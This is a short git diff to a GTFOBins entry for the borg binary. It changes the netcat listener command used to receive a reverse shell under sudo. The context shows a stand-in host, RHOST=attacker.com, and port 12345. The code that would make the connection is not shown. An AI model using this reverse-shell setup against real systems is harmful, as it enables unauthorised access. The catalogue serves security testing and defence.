diff --git a/_gtfobins/borg.md b/_gtfobins/borg.md index 4f559e5..a934554 100644 --- a/_gtfobins/borg.md +++ b/_gtfobins/borg.md @@ -1,6 +1,6 @@ --- sudo: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + - description: Run `nc -lvnp 12345` on the attacker box to receive the shell. code: | RHOST=attacker.com RPORT=12345